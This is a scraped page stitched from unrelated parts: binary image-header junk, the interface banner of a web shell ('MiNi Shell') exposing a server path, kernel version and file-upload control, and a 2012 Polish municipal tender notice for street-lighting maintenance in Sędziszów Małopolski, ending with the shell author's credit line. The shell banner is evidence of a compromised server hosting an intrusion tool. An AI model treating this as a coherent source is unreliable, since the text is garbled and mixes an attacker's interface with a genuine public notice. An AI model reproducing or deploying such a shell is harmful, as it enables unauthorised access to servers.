JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20121203/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20121203/255153-N-2012.html

<p class="kh_header"><b>Sędziszów Małopolski: SYSTEMATYCZNE  WYKONYWANIE  CZYNNOŚCI EKSPLOATACYJNYCH  I  KONSERWACYJNYCH URZĄDZEŃ OŚWIETLENIA  DROGOWEGO  NA  TERENIE  MIASTA  I  GMINY SĘDZISZÓW  MAŁOPOLSKI  W  ROKU  2013</b><br>
<b>Numer ogłoszenia: 255153 - 2012; data zamieszczenia: 03.12.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Sędziszów Małopolski , ul. Rynek 1, 39-120 Sędziszów Małopolski, woj. podkarpackie, tel. 17 22 16 001, faks 17 22 16 313.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.sedziszow-mlp.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> SYSTEMATYCZNE  WYKONYWANIE  CZYNNOŚCI EKSPLOATACYJNYCH  I  KONSERWACYJNYCH URZĄDZEŃ OŚWIETLENIA  DROGOWEGO  NA  TERENIE  MIASTA  I  GMINY SĘDZISZÓW  MAŁOPOLSKI  W  ROKU  2013.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> I. Ilość opraw oświetlenia drogowego na dzień ogłoszenia przetargu wynosi : 1515 sztuk                  ( 1741 sztuk - 226 sztuki objęte gwarancją Wykonawcy = 1515 sztuk )

II. Wykonawca winien w formularzu ofertowym podać koszt konserwacji i eksploatacji oświetlenia drogowego, objętego zamówieniem okresu czasu, tj. 12 miesięcy, wykonania konserwacji i napraw oraz wartość konserwacji i naprawy 1 szt. oprawy na miesiąc (koszt za okres umowy/12/1515 opraw)

III. W przypadku zwiększenia się, w okresie konserwacji , ilości opraw oświetlenia drogowego, zwiększone będzie wynagrodzenie o ilość dodatkowych opraw przemnożone przez stawkę miesięczną za jedną oprawę.

IV. Od Wykonawcy  wymaga się posiadania pisemnej zgody na prowadzenie prac na majątku PGE - Dystrybucja Rzeszów sp. z o.o., w okresie prowadzenia konserwacji i eksploatacji, wraz             z zasadami współpracy. Wszelkie koszty związane z udostępnieniem infrastruktury elektroenergetycznej, dopuszczeń, wyłączeń sieci związanej z eksploatacją oświetlenia, udostępnieniem programu sterującego oświetleniem, ponosi Wykonawca. 

V. Wszelkie prace eksploatacyjne i konserwacyjne mogą wykonywać osoby posiadające odpowiednie uprawnienia kwalifikacyjne i zgodnie z obowiązującą Instrukcją Organizacji Bezpiecznej Pracy  w PGE Dystrybucja Rzeszów sp. z o.o.

VI.  Zakres prac konserwacyjnych obejmuje następujące czynności:

1. Planowe, w określonych terminach czynności eksploatacyjne, wynikające                                     z obowiązujących przepisów i instrukcji eksploatacji:
A.	Prowadzenie kontroli czynnych źródeł światła co najmniej raz w miesiącu, w terminie
uzgodnionym z Zamawiającym, z uwzględnieniem:
a.	stanu widocznych części przewodów, połączeń sprzętu oraz tras kablowych
b.	stanu czystości opraw i źródeł światła
c.	stanu ubytków źródeł światła
d.	stanu urządzeń zabezpieczeniowych i sterowania
e.	stanu słupów i wysięgników
f.	stanu napisów informacyjnych, ostrzegawczych, tabliczek i oznaczeń
g.	kontroli wskazań aparatury kontrolno-pomiarowej

h.	dopuszczalnej liczby niesprawnych jednorazowo źródeł światła oświetlenia, która nie powinna przekraczać 3 % ogólnej liczby opraw zamontowanych na terenie Gminy, na dzień kontroli.
B.	Prowadzenie dokumentacji technicznej konserwowanych urządzeń oświetlenia drogowego:
a.	aktualizacja schematów i planów linii oświetlenia drogowego
b.	wykonanie 1 raz w roku lub w okresie eksploatacji pomiarów ze sporządzeniem protokołów:
- skuteczności ochrony przeciwporażeniowej
- rezystancji uziemień
- napięć i obciążeń obwodów oświetleniowych
       c.   ostateczny termin przekazania prowadzonej dokumentacji Zamawiającemu, to dwa dni    
             robocze przed zakończeniem realizacji umowy lub roku kalendarzowego .
C.  Malowanie i konserwacja metalowych konstrukcji słupów, latarni, szaf w uzgodnieniu                            
z Zamawiającym.
D.  Czyszczenie opraw oraz mycie kloszy przy wymianie źródeł światła lub po stwierdzeniu zanieczyszczeń podczas comiesięcznych przeglądów, w terminie jednego miesiąca od stwierdzenia zanieczyszczenia.
E.  Uzupełnianie i odnawianie napisów oraz znaków ostrzegawczych na słupach i szafach sterowniczych w terminie 7 dni od daty zgłoszenia ubytku.
F.  Wycinka gałęzi zagrażających słupom, oprawom i przewodom instalacji oświetleniowej.
G.  Regulowanie przekrzywionych słupów, wysięgników i opraw do pozycji prawidłowej.
H.  Wymiana opraw  na nowe w ilości  nie mniejszej jak 100 szt. (o mocy nie większej jak 150W) opraw podanych w wykazie Rozmieszczenie opraw na terenie miasta i gminy Sędziszów Młp.  Wymiana dotyczy najbardziej zużytych opraw, wskazanych przez Zamawiającego.
I.   Zmiana programu sterującego czasem świecenia według ustalonego z Zamawiającym harmonogramem czasu świecenia lub doraźne na wniosek Zamawiającego oraz włączenie 
i wyłączenie określonej grupy lamp według wskazanego miejsca i czasu (np. imprezy plenerowe).
J.  Przekazywanie Zamawiającemu pisemnych informacji na temat planowania  i przeprowadzania niezbędnych remontów i modernizacji oświetlenia.
K.  Utrzymanie jednolitych typów wysięgników, opraw, słupów i źródeł światła w określonym ciągu latarń, o ile geometria drogi nie wymusza innego rozwiązania.
L.  Systematyczne usuwanie z latarń, szaf oświetleniowych plakatów, różnych nielegalnych anonsów, reklam i tabliczek informacyjnych.
Ł.  Prowadzenie analizy awaryjności oświetlenia drogowego.

2. Awaryjne a w szczególności:
A.  Likwidacja niesprawnych źródeł światła, w tym uszkodzonych opraw oświetleniowych, w czasie:
- pojedynczych źródeł światła i opraw do 48 godzin od zgłoszenia
- ciągów oświetleniowych do 24 godzin od zgłoszenia.
B.  Wymiana uszkodzonych elementów układu zasilania i sterowania.
C.  Wymiana uszkodzonych szaf sterowniczych w czasie 48 godzin od zgłoszenia.
D.  Lokalizacja i naprawa uszkodzonych linii kablowych, napowietrznych i podziemnych będącymi elementami oświetlenia drogowego w terminie 48 godzin od zgłoszenia.
E.  Likwidacja zagrożeń wynikłych z losowych zdarzeń (wypadek drogowy, wichura, powódź, wandalizm, kradzież, itp.), niezależnie od pory i rodzaju dnia :

      - do 1 godziny od zgłoszenia zabezpieczyć teren przed osobami postronnymi
      - do 24 godzin doprowadzić do stanu normalnego.
F.  W przypadku awarii zasilania szafy oświetleniowej, Wykonawca niezwłocznie powiadomi pogotowie energetyczne PGE Dystrybucja Rzeszów sp. z o.o. i będzie egzekwował niezwłoczne usunięcie awarii (zapis w zasadach współpracy). 
VII.  Zamawiający wymaga od Wykonawcy usunięcia awarii w czasie wyżej podanym,
zgłoszonych przez uprawnionych pracowników Gminy lub Sołtysów z poszczególnych
miejscowości, na wskazany, bezpłatny  nr telefonu przez Wykonawcę, czynny przez całą dobę,
z możliwością rejestracji każdej rozmowy. Wykonawca zapewni i udostępni bilingi z tego
telefonu na każde żądanie Zamawiającego. Osoby zgłaszające będą prowadzić dziennik
zgłoszeń awarii z wpisem daty i godziny powiadomienia oraz zakresu awarii.  Za każdy dzień
opóźnienia wykonania naprawy, Wykonawca zostanie obciążony 1/30 kwoty miesięcznej
konserwacji oprawy przemnożoną przez ilość wyłączonych opraw .

VIII.  Wykonawca zobowiązany jest do prowadzenia na bieżąco Książki Raportów Robót
Konserwacyjnych, w której należy wpisywać zgłaszane usterki z podaniem czasu przyjęcia,
miejsca usterki, sposobu i czasie usunięcia usterki. Książkę Raportów Wykonawca udostępni
do wglądu na każde życzenie Zamawiającemu, a przekaże na koniec trwania umowy.

IX.  W przypadku prac wymagających włączenia oświetlenia poza ustalonym programem
świecenia, Wykonawca uzgodni to z Zamawiającym.

X.  W przypadku prac związanych z usuwaniem awarii w pasie drogowym, Wykonawca 
opracuje i uzgodni z właścicielem drogi, tymczasowy projekt organizacji ruchu drogowego na 
czas trwania robót, zabezpieczy ten teren w odpowiedni sposób zgodnie z Rozporządzeniem
Ministra Infrastruktury z dnia 3 lipca 2003 r. (Dz. U. z dnia 23 grudnia 2003 r.). 
Po zakończeniu prac, teren robót Wykonawca przywróci do stanu pierwotnego.

XI.  Wykonawca własnym kosztem i staraniem dokona utylizacji odpadów powstałych w wyniku prowadzenia prac konserwacyjnych.

XII.  Przekazanie urządzeń do eksploatacji nastąpi po wyłonieniu wykonawcy, przy udziale przedstawicieli Urzędu Gminy, PGE Dystrybucja Rzeszów sp. z o.o. oraz Wykonawcy. 

XIII.  W podobnym składzie nastąpi powrotne przekazanie urządzeń po zakończeniu umowy. Wykonawca zobowiązany będzie do przekazania urządzeń w stanie nie gorszym od przejęcia                w dniu rozpoczęcia obowiązywania umowy, z uwzględnieniem dodatkowych czynności wynikających  z podpisanej umowy..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 50.23.21.00-1.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2013.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Nie jest wymagane</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający dokona oceny spełniania powyższego warunku udziału w postepowaniu na podstawie informacji zawartych w złożonym przez Wykonawcę w ofercie Oświadczeniu o spełnianiu warunków udziału                          w postępowaniu, o którym mowa w pkt 7.1.1 SIWZ, w oparciu o zasadę spełnia - nie spełnia.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony, jeżeli Wykonawca jednoznacznie wykaże,  że w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał należycie co najmniej jedną /1/ usługę w rozumieniu uPzp, związaną z przedmiotem zamówienia, polegającą na wykonywaniu czynności związanych z eksploatacją i konserwacją urządzeń oświetlenia drogowego o wartości całkowitej nie mniejszej niż 150 000 zł. brutto, popartą dokumentami potwierdzającymi, że przedmiotowa usługa została wykonana  należycie.
Zamawiający dokona oceny spełniania powyższego warunku udziału w postepowaniu na podstawie informacji zawartych w złożonych przez Wykonawcę w ofercie oświadczeniach i dokumentach, o których mowa w pkt 7.1 SIWZ, w oparciu o zasadę spełnia - nie spełnia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający dokona oceny spełniania powyższego warunku udziału w postepowaniu na podstawie informacji zawartych w złożonym przez Wykonawcę w ofercie Oświadczeniu o spełnianiu warunków udziału                          w postępowaniu, o którym mowa w pkt 7.1.1 SIWZ, w oparciu o zasadę spełnia - nie spełnia.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony, jeżeli Wykonawca jednoznacznie wykaże, że dysponuje lub będzie dysponował osobami zdolnymi do wykonania zamówienia, posiadającymi doświadczenie, wykształcenie                        i kwalifikacje zawodowe odpowiednie do zadania  jakie zostanie im powierzone, a w szczególności: 
co najmniej dwiema /2/ osobami  posiadającymi uprawnienia do pracy przy urządzeniach elektroenergetycznych SEP grupa I E do 1 kV. 

Zamawiający dokona oceny spełniania powyższego warunku udziału w postepowaniu na podstawie informacji zawartych w złożonych przez Wykonawcę w ofercie oświadczeniach i dokumentach, o których mowa w pkt 7.1 SIWZ, w oparciu o zasadę spełnia - nie spełnia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający dokona oceny spełniania powyższego warunku udziału w postepowaniu na podstawie informacji zawartych w złożonym przez Wykonawcę w ofercie Oświadczeniu o spełnianiu warunków udziału                          w postępowaniu, o którym mowa w pkt 7.1.1 SIWZ, w oparciu o zasadę spełnia - nie spełnia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Pełnomocnictwo lub inny dokument potwierdzający uprawnienia do podpisywania oferty, jeżeli uprawnienia Osoby/Osób podpisujących ofertę nie wynikają z przepisów prawa lub złożonych w ofercie dokumentów rejestrowych. 

Treść pełnomocnictwa powinna jednoznacznie określać czynności do wykonania których pełnomocnik jest upoważniony. Pełnomocnictwo lub inny dokument potwierdzający uprawnienia do podpisywania oferty musi złożony w oryginale lub kopii uwierzytelnionej przez notariusza.

2. W celu potwierdzenia, że Wykonawca polega na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów, Wykonawca złoży                    w ofercie w szczególności pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.  Zamawiający dopuszcza możliwość dokonania istotnych zmian postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy, w przypadku wystąpienia n/w okoliczności,                z uwzględnieniem podanych warunków ich wprowadzenia:
a) zmiany wynagrodzenia w przypadku zmiany ustawowej stawki podatku od towarów i usług VAT,
b) zmiany warunków płatności.
Zmiany do umowy następują na pisemny wniosek jednej ze stron wraz z pisemnym uzasadnieniem konieczności wprowadzenia tych zmian.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.sedziszow-mlp.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski 
w Sędziszowie Małopolskim, ul. Rynek 10, pokój nr 15, 39-120 Sędziszów Małopolski.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 12.12.2012 godzina 11:15, miejsce: Urząd Miejski 
w Sędziszowie Małopolskim, ul. Rynek 1, pokój nr 10, 39-120 Sędziszów Małopolski.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com